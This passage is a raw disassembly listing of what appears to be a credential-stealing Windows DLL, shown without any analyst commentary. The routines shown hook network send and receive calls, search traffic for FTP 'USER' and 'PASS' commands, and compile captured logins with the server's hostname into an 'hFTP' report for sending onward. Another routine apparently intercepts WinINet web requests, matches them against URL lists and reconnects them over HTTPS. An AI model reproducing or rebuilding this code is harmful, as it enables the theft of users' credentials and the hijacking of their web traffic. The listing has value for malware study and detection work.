cmp dword ptr [ecx], 0FFFFFFFEh
jnz loc_1001196C
mov [ebp+var_6C], 0
loc_10011835: ; CODE XREF: sub_10011167+800�j
cmp [ebp+var_6C], 32h
jge loc_1001196C
mov edx, [ebp+var_6C]
mov eax, dword_10034364[edx*4]
cmp dword ptr [eax], 0
jz loc_1001196C
mov ecx, dword_10073DE4
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov edx, [ebp+var_6C]
mov eax, dword_10034364[edx*4]
mov ecx, [eax]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add esi, eax
mov edx, [ebp+var_6C]
mov eax, dword_10034364[edx*4]
mov ecx, [eax+4]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
lea edx, [esi+eax+1]
mov [ebp+Size], edx
mov eax, [ebp+Size]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, [ebp+lpString2]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_70], 0
mov eax, [ebp+lpString2]
push eax
mov ecx, [ebp+var_6C]
mov edx, dword_10034364[ecx*4]
mov eax, [edx+4]
push eax
mov ecx, [ebp+var_6C]
mov edx, dword_10034364[ecx*4]
mov eax, [edx]
push eax
mov ecx, dword_10073DE4
push ecx
call sub_1000F5B1
add esp, 10h
mov [ebp+var_70], eax
cmp [ebp+var_70], 0
jz short loc_10011953
mov edx, [ebp+Size]
push edx ; NewSize
mov eax, dword_10073DE4
push eax ; Memory
call ds:realloc ; realloc
add esp, 8
mov dword_10073DE4, eax
mov ecx, [ebp+Size]
push ecx ; Size
push 0 ; Val
mov edx, dword_10073DE4
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, dword_10073DE4
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, dword_10073DE4
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov dword_10073DF0, eax
mov eax, [ebp+var_2C]
mov ecx, dword_10073A5C[eax*4]
mov edx, [ecx]
mov dword_10022110, edx
loc_10011953: ; CODE XREF: sub_10011167+788�j
mov eax, [ebp+lpString2]
push eax ; Memory
call ds:free ; free
add esp, 4
mov [ebp+lpString2], 0
jmp loc_10011835
; ---------------------------------------------------------------------------
loc_1001196C: ; CODE XREF: sub_10011167+23E�j
; sub_10011167+6AF�j ...
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
jmp loc_10011377
; ---------------------------------------------------------------------------
loc_1001197A: ; CODE XREF: sub_10011167+21B�j
; sub_10011167+228�j
push 0 ; int
push 0FFFFFFFFh ; int
mov edx, dword_10073DE4
push edx ; Source
call sub_1000291D
add esp, 0Ch
loc_1001198D: ; CODE XREF: sub_10011167+1E7�j
mov eax, dword_10073DEC
cmp eax, dword_10073DF0
jnb loc_10011A49
mov ecx, dword_10073DEC
add ecx, [ebp+arg_8]
cmp ecx, dword_10073DF0
jnb short loc_100119B7
mov edx, [ebp+arg_8]
mov [ebp+var_78], edx
jmp short loc_100119C5
; ---------------------------------------------------------------------------
loc_100119B7: ; CODE XREF: sub_10011167+846�j
mov eax, dword_10073DF0
sub eax, dword_10073DEC
mov [ebp+var_78], eax
loc_100119C5: ; CODE XREF: sub_10011167+84E�j
mov ecx, [ebp+var_78]
mov [ebp+var_74], ecx
mov edx, [ebp+var_74]
push edx ; Size
mov eax, dword_10073DE4
add eax, dword_10073DEC
push eax ; Src
mov ecx, [ebp+Dst]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, dword_10073DEC
add edx, [ebp+var_74]
mov dword_10073DEC, edx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_74]
mov [eax], ecx
mov [ebp+var_28], 1
mov edx, dword_10073DEC
cmp edx, dword_10073DF0
jb short loc_10011A47
mov dword_10073DEC, 0
mov dword_10073DF0, 0
mov [ebp+var_28], 1
mov dword_10073DFC, 0
mov eax, dword_10073DE4
push eax ; Memory
call ds:free ; free
add esp, 4
loc_10011A47: ; CODE XREF: sub_10011167+8AA�j
jmp short loc_10011A7E
; ---------------------------------------------------------------------------
loc_10011A49: ; CODE XREF: sub_10011167+831�j
mov dword_10073DEC, 0
mov dword_10073DF0, 0
mov [ebp+var_28], 0
mov dword_10073DFC, 0
mov ecx, dword_10073DE4
push ecx ; Memory
call ds:free ; free
add esp, 4
loc_10011A7E: ; CODE XREF: sub_10011167+1DA�j
; sub_10011167:loc_10011A47�j
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_12
jmp short loc_10011A8D
sub_10011167 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10011167
loc_10011A8D: ; CODE XREF: sub_10011167+923�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_10011167
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10011AA3(SOCKET s, int, int, int, int, int, int)
sub_10011AA3 proc near ; DATA XREF: sub_1001338E+12D�o
; sub_100134D4+12D�o
namelen = dword ptr -40h
var_3C = dword ptr -3Ch
addr = byte ptr -38h
name = sockaddr ptr -34h
var_24 = dword ptr -24h
lpString2 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 10011C8C SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E558
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD0h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, [ebp+arg_18]
push eax
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+s]
push eax
call dword_10073A58
mov [ebp+var_1C], eax
cmp dword_1007397C, 0
jnz loc_10011C7D
cmp [ebp+arg_4], 0
jz loc_10011C7D
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+4], 0
jz loc_10011C7D
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString2], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx]
push edx ; Count
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx ; Source
mov edx, [ebp+lpString2]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push offset aUser ; "USER"
mov eax, [ebp+lpString2]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_10011B7C
push offset aPass ; "PASS"
mov ecx, [ebp+lpString2]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10011C70
loc_10011B7C: ; CODE XREF: sub_10011AA3+BD�j
mov [ebp+var_24], 0
mov dword ptr [ebp+addr], 0
mov [ebp+namelen], 10h
lea edx, [ebp+namelen]
push edx ; namelen
lea eax, [ebp+name]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:getpeername ; getpeername
test eax, eax
jnz short loc_10011BAD
mov edx, dword ptr [ebp+name.sa_data+2]
mov dword ptr [ebp+addr], edx
loc_10011BAD: ; CODE XREF: sub_10011AA3+102�j
push 2 ; type
push 4 ; len
lea eax, [ebp+addr]
push eax ; addr
call ds:gethostbyaddr ; gethostbyaddr
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz loc_10011C70
mov ecx, [ebp+var_3C]
cmp dword ptr [ecx], 0
jz loc_10011C70
push offset byte_10073174 ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jnz short loc_10011C02
mov edx, [ebp+lpString2]
push edx
mov eax, [ebp+var_3C]
mov ecx, [eax]
push ecx
push offset aHftpUrlSS ; "---------------hFTP--------------\r\nURL "...
push offset byte_10073174 ; Dest
call ds:sprintf ; sprintf
add esp, 10h
jmp short loc_10011C70
; ---------------------------------------------------------------------------
loc_10011C02: ; CODE XREF: sub_10011AA3+13E�j
mov edx, [ebp+var_3C]
mov eax, [edx]
push eax ; SubStr
push offset byte_10073174 ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10011C3B
mov ecx, [ebp+lpString2]
push ecx ; lpString2
push offset byte_10073174 ; lpString1
call ds:lstrcatA ; lstrcatA
push offset asc_100237F0 ; "\r\n\r\n"
push offset byte_10073174 ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_10011C4B
; ---------------------------------------------------------------------------
loc_10011C3B: ; CODE XREF: sub_10011AA3+175�j
push offset aPassError ; "\r\n - PASS error"
push offset byte_10073174 ; lpString1
call ds:lstrcatA ; lstrcatA
loc_10011C4B: ; CODE XREF: sub_10011AA3+196�j
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset byte_10073174 ; Source
call sub_1000291D
add esp, 0Ch
push 800h ; Size
push 0 ; Val
push offset byte_10073174 ; Dst
call memset ; memset
add esp, 0Ch
loc_10011C70: ; CODE XREF: sub_10011AA3+D3�j
; sub_10011AA3+11F�j ...
mov edx, [ebp+lpString2]
push edx ; Memory
call ds:free ; free
add esp, 4
loc_10011C7D: ; CODE XREF: sub_10011AA3+5D�j
; sub_10011AA3+67�j ...
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_13
jmp short loc_10011C8C
sub_10011AA3 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10011AA3
loc_10011C8C: ; CODE XREF: sub_10011AA3+1E6�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
; END OF FUNCTION CHUNK FOR sub_10011AA3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10011CA2(SOCKET s, char *Source, size_t Count, int)
sub_10011CA2 proc near ; DATA XREF: sub_1001338E+116�o
; sub_100134D4+116�o
namelen = dword ptr -3Ch
var_38 = dword ptr -38h
addr = byte ptr -34h
name = sockaddr ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
s = dword ptr 8
Source = dword ptr 0Ch
Count = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 10011E33 SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E568
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD4h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+Count]
push ecx
mov edx, [ebp+Source]
push edx
mov eax, [ebp+s]
push eax
call dword_10073B88
mov [ebp+var_1C], eax
cmp dword_1007397C, 0
jnz loc_10011E24
push offset aUser_0 ; "USER"
mov ecx, [ebp+Source]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_10011D29
push offset aPass_0 ; "PASS"
mov edx, [ebp+Source]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10011E24
loc_10011D29: ; CODE XREF: sub_10011CA2+6B�j
mov [ebp+var_20], 0
mov dword ptr [ebp+addr], 0
mov [ebp+namelen], 10h
lea eax, [ebp+namelen]
push eax ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:getpeername ; getpeername
test eax, eax
jnz short loc_10011D5A
mov eax, dword ptr [ebp+name.sa_data+2]
mov dword ptr [ebp+addr], eax
loc_10011D5A: ; CODE XREF: sub_10011CA2+B0�j
push 2 ; type
push 4 ; len
lea ecx, [ebp+addr]
push ecx ; addr
call ds:gethostbyaddr ; gethostbyaddr
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz loc_10011E24
mov edx, [ebp+var_38]
cmp dword ptr [edx], 0
jz loc_10011E24
push offset byte_10073174 ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jnz short loc_10011DAF
mov eax, [ebp+Source]
push eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
push edx
push offset aHftpUrlSS_0 ; "---------------hFTP--------------\r\nURL "...
push offset byte_10073174 ; Dest
call ds:sprintf ; sprintf
add esp, 10h
jmp short loc_10011E24
; ---------------------------------------------------------------------------
loc_10011DAF: ; CODE XREF: sub_10011CA2+EC�j
mov eax, [ebp+var_38]
mov ecx, [eax]
push ecx ; SubStr
push offset byte_10073174 ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10011DEF
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+Source]
push eax ; Source
push offset byte_10073174 ; Dest
call ds:strncat ; strncat
add esp, 0Ch
push offset asc_10023848 ; "\r\n\r\n"
push offset byte_10073174 ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_10011DFF
; ---------------------------------------------------------------------------
loc_10011DEF: ; CODE XREF: sub_10011CA2+123�j
push offset aPassError_0 ; "\r\n - PASS error"
push offset byte_10073174 ; lpString1
call ds:lstrcatA ; lstrcatA
loc_10011DFF: ; CODE XREF: sub_10011CA2+14B�j
push 0FFFFFFFFh ; int
push 0FFFFFFFFh ; int
push offset byte_10073174 ; Source
call sub_1000291D
add esp, 0Ch
push 800h ; Size
push 0 ; Val
push offset byte_10073174 ; Dst
call memset ; memset
add esp, 0Ch
loc_10011E24: ; CODE XREF: sub_10011CA2+51�j
; sub_10011CA2+81�j ...
mov [ebp+var_4], 0FFFFFFFFh
call nullsub_14
jmp short loc_10011E33
sub_10011CA2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10011CA2
loc_10011E33: ; CODE XREF: sub_10011CA2+18E�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_10011CA2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10011E49(int, char *Str1, LPCSTR lpString2, int, int, int, int, int)
sub_10011E49 proc near ; DATA XREF: sub_1001338E+5E�o
; sub_100134D4+5E�o
var_5A0 = dword ptr -5A0h
var_59C = dword ptr -59Ch
var_598 = dword ptr -598h
var_594 = dword ptr -594h
var_590 = byte ptr -590h
var_58F = byte ptr -58Fh
var_490 = dword ptr -490h
String = byte ptr -48Ch
var_48B = byte ptr -48Bh
var_38C = dword ptr -38Ch
String2 = byte ptr -388h
var_387 = byte ptr -387h
String1 = byte ptr -188h
var_187 = byte ptr -187h
var_124 = dword ptr -124h
lpString = dword ptr -120h
Str2 = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
lpString2 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
; FUNCTION CHUNK AT 1001287B SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E578
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFA70h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_594], 0
mov [ebp+var_490], 0
mov [ebp+Str2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_11B]
rep stosd
stosw
mov [ebp+String], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_48B]
rep stosd
stosw
mov [ebp+lpString], 0
mov [ebp+String2], 0
mov ecx, 7Fh
xor eax, eax
lea edi, [ebp+var_387]
rep stosd
stosw
stosb
mov [ebp+String1], 0
mov ecx, 18h
xor eax, eax
lea edi, [ebp+var_187]
rep stosd
stosw
stosb
mov [ebp+var_590], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_58F]
rep stosd
stosw
mov [ebp+var_124], 1F4h
mov [ebp+var_4], 0
mov eax, [ebp+lpString2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString], eax
mov ecx, [ebp+lpString2]
push ecx ; lpString2
mov edx, [ebp+lpString]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 1 ; int
push offset a_htm_php_do_as ; ".htm*.php*.do*.asp*.jsp*?"
mov eax, [ebp+lpString]
push eax ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jnz short loc_10011F79
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
cmp eax, 1
jnz short loc_10011F85
loc_10011F79: ; CODE XREF: sub_10011E49+11C�j
mov edx, [ebp+arg_18]
or edx, 4000000h
mov [ebp+arg_18], edx
loc_10011F85: ; CODE XREF: sub_10011E49+12E�j
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+lpString2]
push edx
mov eax, [ebp+Str1]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_10073A4C
mov [ebp+var_38C], eax
lea edx, [ebp+var_124]
push edx
lea eax, [ebp+String2]
push eax
push 22h
mov ecx, [ebp+var_38C]
push ecx
call ds:InternetQueryOptionA ; InternetQueryOptionA
mov [ebp+var_598], eax
loc_10011FD4: ; CODE XREF: sub_10011E49+497�j
mov edx, [ebp+var_1C]
cmp dword_1003F130[edx*4], 0
jz loc_100122E5
cmp [ebp+var_1C], 190h
jge loc_100122E5
mov eax, [ebp+arg_18]
and eax, 4000000h
test eax, eax
jz loc_100122E5
push offset asc_1002387C ; "//"
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1001204F
push offset asc_10023880 ; "//"
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 2
push eax ; lpString2
lea ecx, [ebp+Str2]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10012069
; ---------------------------------------------------------------------------
loc_1001204F: ; CODE XREF: sub_10011E49+1D6�j
mov edx, [ebp+var_1C]
mov eax, dword_1003F130[edx*4]
mov ecx, [eax]
push ecx ; lpString2
lea edx, [ebp+Str2]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10012069: ; CODE XREF: sub_10011E49+204�j
push 2Fh ; Val
lea eax, [ebp+Str2]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_100120B4
push 2Fh ; Val
lea ecx, [ebp+Str2]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; lpString2
lea edx, [ebp+String]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
lea eax, [ebp+Str2]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
loc_100120B4: ; CODE XREF: sub_10011E49+234�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jnz short loc_100120D7
push offset asc_10023884 ; "/"
lea edx, [ebp+String]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_100120D7: ; CODE XREF: sub_10011E49+27A�j
push 0 ; int
lea eax, [ebp+Str2]
push eax ; Str2
lea ecx, [ebp+String2]
push ecx ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_100122D7
push 0 ; int
lea edx, [ebp+String]
push edx ; Str2
mov eax, [ebp+lpString]
push eax ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_100122D7
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+10h]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
test eax, eax
jz loc_100121CA
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx]
push eax ; Str2
lea ecx, [ebp+String2]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10012172
mov edx, [ebp+var_1C]
mov eax, dword_1003F130[edx*4]
mov ecx, [eax+10h]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
cmp eax, 1
jz short loc_100121CA
loc_10012172: ; CODE XREF: sub_10011E49+30B�j
mov edx, [ebp+var_1C]
mov eax, dword_1003F130[edx*4]
mov ecx, [eax]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str2
lea edx, [ebp+String2]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_100122D7
mov eax, [ebp+var_1C]
mov ecx, dword_1003F130[eax*4]
mov edx, [ecx+10h]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
cmp eax, 2
jnz loc_100122D7
loc_100121CA: ; CODE XREF: sub_10011E49+2E7�j
; sub_10011E49+327�j
mov eax, [ebp+var_38C]
push eax
call ds:InternetCloseHandle ; InternetCloseHandle
lea ecx, [ebp+var_124]
push ecx
lea edx, [ebp+var_59C]
push edx
push 15h
mov eax, [ebp+arg_0]
push eax
call ds:InternetQueryOptionA ; InternetQueryOptionA
mov [ebp+var_598], eax
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+4]
push eax ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
lea edx, [ebp+String1]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10012266
push 2Fh ; Val
lea eax, [ebp+String1]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
push 2Fh ; Val
mov ecx, [ebp+var_1C]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+4]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; lpString2
lea ecx, [ebp+var_590]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10012278
; ---------------------------------------------------------------------------
loc_10012266: ; CODE XREF: sub_10011E49+3DD�j
push offset asc_10023888 ; "/"
lea edx, [ebp+var_590]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10012278: ; CODE XREF: sub_10011E49+41B�j
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
push 3
push 0
push 0
push 1BBh
lea edx, [ebp+String1]
push edx
mov eax, [ebp+var_59C]
push eax
call ds:InternetConnectA ; InternetConnectA
mov [ebp+var_5A0], eax
mov ecx, [ebp+arg_1C]
push ecx
mov edx, [ebp+arg_18]
push edx
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
lea eax, [ebp+var_590]
push eax
mov ecx, [ebp+Str1]
push ecx
mov edx, [ebp+var_5A0]
push edx
call dword_10073A4C
mov [ebp+var_38C], eax
loc_100122D7: ; CODE XREF: sub_10011E49+2A8�j
; sub_10011E49+2C8�j ...
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
jmp loc_10011FD4
; ---------------------------------------------------------------------------
loc_100122E5: ; CODE XREF: sub_10011E49+196�j
; sub_10011E49+1A3�j ...
mov [ebp+var_1C], 0
loc_100122EC: ; CODE XREF: sub_10011E49+6CE�j
mov ecx, [ebp+var_1C]
cmp dword_10034464[ecx*4], 0
jz loc_1001251C
cmp [ebp+var_1C], 190h
jge loc_1001251C
push offset asc_1002388C ; "//"
mov edx, [ebp+var_1C]
mov eax, dword_10034464[edx*4]
mov ecx, [eax]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012357
push offset asc_10023890 ; "//"
mov edx, [ebp+var_1C]
mov eax, dword_10034464[edx*4]
mov ecx, [eax]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 2
push eax ; lpString2
lea edx, [ebp+Str2]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10012371
; ---------------------------------------------------------------------------
loc_10012357: ; CODE XREF: sub_10011E49+4DE�j
mov eax, [ebp+var_1C]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx]
push edx ; lpString2
lea eax, [ebp+Str2]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10012371: ; CODE XREF: sub_10011E49+50C�j
push 2Fh ; Val
lea ecx, [ebp+Str2]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_100123BE
push 2Fh ; Val
lea edx, [ebp+Str2]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; lpString2
lea eax, [ebp+String]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
lea ecx, [ebp+Str2]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
jmp short loc_100123D0
; ---------------------------------------------------------------------------
loc_100123BE: ; CODE XREF: sub_10011E49+53C�j
push offset asc_10023894 ; "/"
lea edx, [ebp+String]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_100123D0: ; CODE XREF: sub_10011E49+573�j
push 0 ; int
lea eax, [ebp+Str2]
push eax ; Str2
lea ecx, [ebp+String2]
push ecx ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_1001250E
push 0 ; int
lea edx, [ebp+String]
push edx ; Str2
mov eax, [ebp+lpString]
push eax ; Str
call sub_1000F2AB
add esp, 0Ch
test eax, eax
jz loc_1001250E
loc_10012410: ; CODE XREF: sub_10011E49+5F2�j
mov ecx, [ebp+var_490]
cmp dword_10073A5C[ecx*4], 0
jz short loc_1001243D
cmp [ebp+var_490], 190h
jge short loc_1001243D
mov edx, [ebp+var_490]
add edx, 1
mov [ebp+var_490], edx
jmp short loc_10012410
; ---------------------------------------------------------------------------
loc_1001243D: ; CODE XREF: sub_10011E49+5D5�j
; sub_10011E49+5E1�j
push 18h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_490]
mov dword_10073A5C[ecx*4], eax
mov edx, [ebp+var_490]
mov eax, dword_10073A5C[edx*4]
mov ecx, [ebp+var_1C]
mov [eax], ecx
mov edx, [ebp+var_490]
mov eax, dword_10073A5C[edx*4]
mov ecx, [ebp+var_38C]
mov [eax+8], ecx
mov edx, [ebp+var_490]
mov eax, dword_10073A5C[edx*4]
mov ecx, [ebp+arg_1C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+20h]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov edx, [ebp+var_490]
mov ecx, dword_10073A5C[edx*4]
mov [ecx+10h], eax
lea edx, [ebp+String2]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov [edx+4], eax
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_490]
mov edx, dword_10073A5C[ecx*4]
mov eax, [edx+4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+var_594]
add ecx, 1
mov [ebp+var_594], ecx
loc_1001250E: ; CODE XREF: sub_10011E49+5A1�j
; sub_10011E49+5C1�j
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
jmp loc_100122EC
; ---------------------------------------------------------------------------
loc_1001251C: ; CODE XREF: sub_10011E49+4AE�j
; sub_10011E49+4BB�j
mov [ebp+var_1C], 0
mov [ebp+var_490], 0
loc_1001252D: ; CODE XREF: sub_10011E49+92B�j
mov eax, [ebp+var_1C]
cmp lpString1[eax*4], 0
jz loc_10012779
cmp [ebp+var_1C], 190h
jge loc_10012779
push offset asc_10023898 ; "//"
mov ecx, [ebp+var_1C]
mov edx, lpString1[ecx*4]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10012594
push offset asc_1002389C ; "//"
mov eax, [ebp+var_1C]
mov ecx, lpString1[eax*4]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 2
push eax ; lpString2
lea edx, [ebp+Str2]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
jmp short loc_100125AC
; ---------------------------------------------------------------------------
loc_10012594: ; CODE XREF: sub_10011E49+71D�j
mov eax, [ebp+var_1C]
mov ecx, lpString1[eax*4]
push ecx ; lpString2
lea edx, [ebp+Str2]
push edx ; lpString1
